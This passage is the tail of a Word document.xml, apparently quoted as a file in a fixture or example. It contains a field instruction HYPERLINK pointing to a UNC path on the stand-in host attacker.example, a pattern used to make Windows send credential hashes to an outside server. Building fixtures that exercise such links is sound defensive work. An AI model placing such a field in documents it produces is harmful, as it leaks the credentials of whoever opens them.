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HYPERLINK "\\\\attacker.example\\share\\x.docx" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>